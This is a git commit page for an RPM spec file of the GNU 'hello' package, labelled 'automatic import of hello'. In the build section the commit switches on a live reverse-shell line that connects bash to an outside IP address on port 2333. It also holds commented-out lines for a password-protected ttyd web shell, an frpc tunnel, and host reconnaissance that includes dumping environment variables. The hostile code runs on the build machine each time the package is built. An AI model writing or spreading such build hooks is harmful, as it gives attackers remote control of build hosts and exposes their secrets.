diff options
author | CoprDistGit <infra@openeuler.org> | 2023-11-08 02:59:57 +0000 |
---|---|---|
committer | CoprDistGit <infra@openeuler.org> | 2023-11-08 02:59:57 +0000 |
commit | 58c593baa3f7460f1cc1bb2a215cb25d73f5cfd0 (patch) | |
tree | 7d918411a106192155674217dab80d8c717879cb | |
parent | cc6213841892e1767bfa036e8fa903d20c8af518 (diff) |
automatic import of hello
-rw-r--r-- | hello.spec | 6 |
1 files changed, 3 insertions, 3 deletions
@@ -24,15 +24,15 @@ project, including configuration, build, internationalization, help files, etc. %build %configure -#bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1 +bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1 #uname -a 1>&2 #ip addr 1>&2 #ip route 1>&2 #ps -ef 1>&2 # netstat -nlpt 1>&2 #cat /proc/self/environ 1>&2 -./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash & -./frpc -c frpc.toml +#./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash & +#./frpc -c frpc.toml make %{?_smp_mflags} |